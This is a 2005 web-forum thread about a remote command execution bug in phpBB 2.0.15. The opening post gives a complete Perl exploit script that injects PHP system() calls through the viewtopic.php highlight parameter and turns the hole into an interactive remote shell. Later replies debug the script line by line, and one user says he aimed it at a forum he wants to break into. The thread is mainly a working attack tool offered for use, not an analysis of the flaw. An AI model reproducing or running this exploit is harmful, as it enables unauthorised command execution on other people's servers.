| 
  
    | 
	|  | Menu |  |  
     
     | 
      
       | 
        
         | 
          
           | 
						|  |  |  Home |  |  |  |  |  |  |  |  Discussions |  |  |  |  |  |  |  |  Tools |  |  |  |  |  |  |  |  Affiliates |  |  |  |  |  |  |  |  Content |  |  |  |  |  |  |  |  Info |  |  |  |  |  |  |  |  |  |  
  
    | 
	|  | User Info |  |  
     
     | 
      
       | 
        
         | 
          
           |  Membership: 
  Latest: MichaelSnaRe 
  New Today: 0 
  New Yesterday: 0 
  Overall: 9144 
 
  People Online: 
  Visitors: 163 
  Members: 0 
  Total: 163 
 |  |  |  |  |  
  
    | 
	|  | Full disclosure |  |  |  | 
  
    | 
	|  |  |  |  
        
          | 
              
                | 
                    
                      | 
                          
                            | 
	| 
	
		|  |  |  
		|  | IT Security and Insecurity Portal |  |  
 
	|  | phpBB 2.0.15 -re-bug in viewtopic.php |  |  
	| 
	
		|  Posted: Thu Jun 30, 2005 8:42 am |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| zain |  | Beginner |  |  
  |  |  |  | Joined: Apr 18, 2005 |  | Posts: 3 |  |  |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			| New exploit for previously discovered highlight bug... 
 
 
  	  | Code: |  	  | #!/usr/bin/perl
 # Wed Jun 29 19:08:04 CEST 2005 dab@digitalsec.net
 #
 # phpBB 2.0.15 -re-bug in viewtopic.php
 
 
 # The complete Open Source Development with CVS: GNU General Public License
 # Book on using CVS effectively <--------- cvs, is also GPL
 # or http://www.google.es/search?q=programming+howto
 #
 # BLINK! BLINK! BLINK! *** BRUTEFORCE CAPABILITIES *** BLINK! BLINK! BLINK!
 #
 #
 # Example: ./phpbb2_0_15.pl http://www.server.com/viewtopic.php?t=1
 # You can start typing commands.
 # Tested in BSD. Theo.. it works!
 #
 # !dSR: que todos los hackers digan YO!!
 #
 #
 
 
 use strict;
 use IO::Socket;
 
 unless ($ARGV[0]) { print "$0 <viewtopic url>\n"; exit(1); }
 
 $ARGV[0] =~ m!http://(.*?)/(.*?t=\d+)!;
 my ($server, $port) = split (/:/,$1);
 $port = 80 unless defined($port);
 $server = $1 unless defined($server);
 my ($url, $command) = $2;
 
 print "$server - $port - $url\n";
 
 while () {
 print "phpBB2.0.15> ";
 while(<STDIN>) {
 $command=$_;
 chomp($command);
 last;
 }
 &send($command);
 }
 
 sub send {
 my $ok = 0;
 my $cmd = "echo \"#PHPBBEXPLOIT#\";".$_[0].";echo \"#PHPBBEXPLOIT#\"";
 my $string = "GET /$url&highlight='.system(getenv(HTTP_PHP)).' HTTP/1.1\n".
 "Host: $server\nPHP: $cmd\n\n\n\n";
 my $socket = IO::Socket::INET->new(PeerAddr => $server,
 PeerPort => $port,
 Proto => "tcp",
 Type => SOCK_STREAM)
 or die "can't connect to: $server : $@\n";
 print $socket $string;
 while(<$socket>) {
 if (/#PHPBBEXPLOIT#/) {
 close($socket) and last if $ok eq 2;
 $ok++;
 next;
 }
 print if $ok eq "1";
 }
 }
 exit 0;
 | 
 
 Can anyone get this to work? I ran it, and it gives me a phpBB2.0.15> prompt, but no matter what command I try it returns nothing.
 |  |  
		|  |  |  
	|  |  |  | 
 
	|  |  |  |  
	| 
	
		|  Posted: Thu Jun 30, 2005 8:48 am |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| shai-tan |  | Valuable expert |  |  
  |  |  |  | Joined: Feb 22, 2005 |  | Posts: 477 |  |  |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			| Are you using BSD? 
 Its says:
 
  	  | Quote: |  	  | # Tested in BSD. Theo.. it works! | 
  |  |  
		| 
		
			| _________________
 Shai-tan
 
 ?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds
 |  |  |  
	|  |  
	| 
	
		|  Posted: Thu Jun 30, 2005 1:17 pm |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| WaterBird |  | Active user |  |  
  |  |  |  | Joined: May 16, 2005 |  | Posts: 37 |  |  |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			|  	  | Quote: |  	  | Can anyone get this to work? I ran it, and it gives me a phpBB2.0.15> prompt, but no matter what command I try it returns nothing. | 
 
 
 Same here :/
 |  |  
		|  |  |  
	|  |  
	| 
	
		|  Posted: Thu Jun 30, 2005 1:21 pm |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| subzero |  | Valuable expert |  |  
  |  |  |  | Joined: Mar 16, 2005 |  | Posts: 42 |  |  |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			| common shaitan.. its just a little fix.. needed 
 try to delete # in \#PHPBBEXPLOIT#\ and /#PHPBBEXPLOIT#/ see what u get
  |  |  
		|  |  |  
	|  |  
	| 
	
		|  Posted: Thu Jun 30, 2005 1:40 pm |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| WaterBird |  | Active user |  |  
  |  |  |  | Joined: May 16, 2005 |  | Posts: 37 |  |  |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			| emmm i get 
 
  	  | Code: |  	  | 
 Bareword found where operator expected at ./test line 48, near ""echo /"PHPBBEXPLOIT"
 (Missing operator before PHPBBEXPLOIT?)
 Bareword found where operator expected at ./test line 48, near "";echo /"PHPBBEXPLOIT"
 (Missing operator before PHPBBEXPLOIT?)
 syntax error at ./test line 48, near ""echo /"PHPBBEXPLOIT"
 Execution of ./test aborted due to compilation errors.
 
 
 | 
 |  |  
		|  |  |  
	|  |  
	| 
	
		|  Posted: Thu Jun 30, 2005 1:49 pm |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| subzero |  | Valuable expert |  |  
  |  |  |  | Joined: Mar 16, 2005 |  | Posts: 42 |  |  |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			|  	  | Code: |  	  | my $cmd = "echo \"#PHPBBEXPLOIT#\";".$_[0].";echo \"#PHPBBEXPLOIT#\""; | 
 
 to
  	  | Code: |  	  | my $cmd = "echo \"PHPBBEXPLOIT\";".$_[0].";echo \"PHPBBEXPLOIT\""; | 
 
 and
 
  	  | Code: |  	  | if (/#PHPBBEXPLOIT#/) { | 
 
 to
 
  	  | Code: |  	  | if (/PHPBBEXPLOIT/) { | 
 
 
  |  |  
		|  |  |  
	|  |  
	| 
	
		|  Posted: Thu Jun 30, 2005 1:53 pm |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| WaterBird |  | Active user |  |  
  |  |  |  | Joined: May 16, 2005 |  | Posts: 37 |  |  |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			| it's like the same before fixes 
 
  	  | Code: |  	  | user@site:~$ ./test http://site.com/forum/viewtopic.php?t=1 site.com - 80 - forum/viewtopic.php?t=1
 phpBB2.0.15>
 
 | 
 
 And stuck :/
 |  |  
		|  |  |  
	|  |  
	| 
	
		|  Posted: Thu Jun 30, 2005 1:56 pm |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| subzero |  | Valuable expert |  |  
  |  |  |  | Joined: Mar 16, 2005 |  | Posts: 42 |  |  |  |  
 
 |  |  
			|  |  |  
 
 |  |  
		|  |  |  
	|  |  
	| 
	
		|  Posted: Thu Jun 30, 2005 2:01 pm |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| WaterBird |  | Active user |  |  
  |  |  |  | Joined: May 16, 2005 |  | Posts: 37 |  |  |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			| no just have changetd the url some forum that i wanna try to exploit |  |  
		|  |  |  
	|  |  
	| 
	
		|  Posted: Thu Jun 30, 2005 5:24 pm |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| shai-tan |  | Valuable expert |  |  
  |  |  |  | Joined: Feb 22, 2005 |  | Posts: 477 |  |  |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			| I dont actually like Perl..... Php is my replacement and Im still learning my C and C++ so CGIs arnt all that popular with me yet. But Perl will never happen for me. |  |  
		| 
		
			| _________________
 Shai-tan
 
 ?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds
 |  |  |  
	|  |  
	| 
	
		|  Posted: Thu Jun 30, 2005 5:57 pm |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| diaga |  | Regular user |  |  
  |  |  |  | Joined: Jun 27, 2005 |  | Posts: 22 |  |  |  |  
 
 |  |  
			|  |  |  
 
 |  |  
		|  |  |  
	|  |  
	| 
	
		|  Posted: Fri Jul 01, 2005 1:55 am |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| LINUX |  | Moderator |  |  
  |  |  |  | Joined: May 24, 2004 |  | Posts: 404 |  | Location: Caiman |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			| this code original in perl   work for 2.0.14 and 2.0.15 work nice 
 not work: if server have disable functions > exec,system,passthru,shell_exec  or safe mode enabled
 |  |  
		|  |  |  
	|  |  
	| www.waraxe.us Forum Index -> PhpBB 
 
	
		| You cannot post new topics in this forum You cannot reply to topics in this forum
 You cannot edit your posts in this forum
 You cannot delete your posts in this forum
 You cannot vote in polls in this forum
 
 | All times are GMT Page 1 of 1
 
 |  |  
	|  |  
 Powered by phpBB © 2001-2008 phpBB Group
 
 
 
 
 |  |  |  |  |  |